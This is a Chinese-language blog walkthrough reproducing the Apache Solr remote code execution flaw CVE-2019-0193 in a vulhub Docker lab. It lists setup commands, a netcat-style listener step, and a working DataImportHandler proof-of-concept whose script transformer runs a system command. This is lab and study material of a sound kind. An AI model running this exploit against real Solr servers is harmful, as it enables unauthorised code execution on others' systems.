Apache Solr rce复现(CVE-2019-0193)

Apache Solr rce复现(CVE-2019-0193)

前言

影响版本
Apache Solr < 8.2.0

环境搭建

启动docker

systemctl start docker

获取vulhub

git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git

进入对应目录

cd vulhub/solr/CVE-2019-0193/

启动容器

docker-compose up -d
docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db # 创建名为“test”的Core,并开启dataimport

查看容器

docker ps

在这里插入图片描述

漏洞复现

centos启动监听

nv -lvvp 80

访问

http://192.168.164.162:8983/solr/#/

在这里插入图片描述
在这里插入图片描述
打开刚刚创建好的test核心,选择Dataimport功能并选择debug模式,填入以下POC

<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
          function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");
          }
  ]]></script>
  <document>
    <entity name="stackoverflow"
            url="https://stackoverflow.com/feeds/tag/solr"
            processor="XPathEntityProcessor"
            forEach="/feed"
            transformer="script:poc" />
  </document>
</dataConfig>

点击Execute with this Confuguration
查看生成文件

docker exec -it 939 /bin/bash
ls /tmp

在这里插入图片描述

参考文章

https://vulhub.org/#/environments/solr/CVE-2019-0193/
https://mp.weixin.qq.com/s/hCLEfDpXfDDWTTDd6vgtVA

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章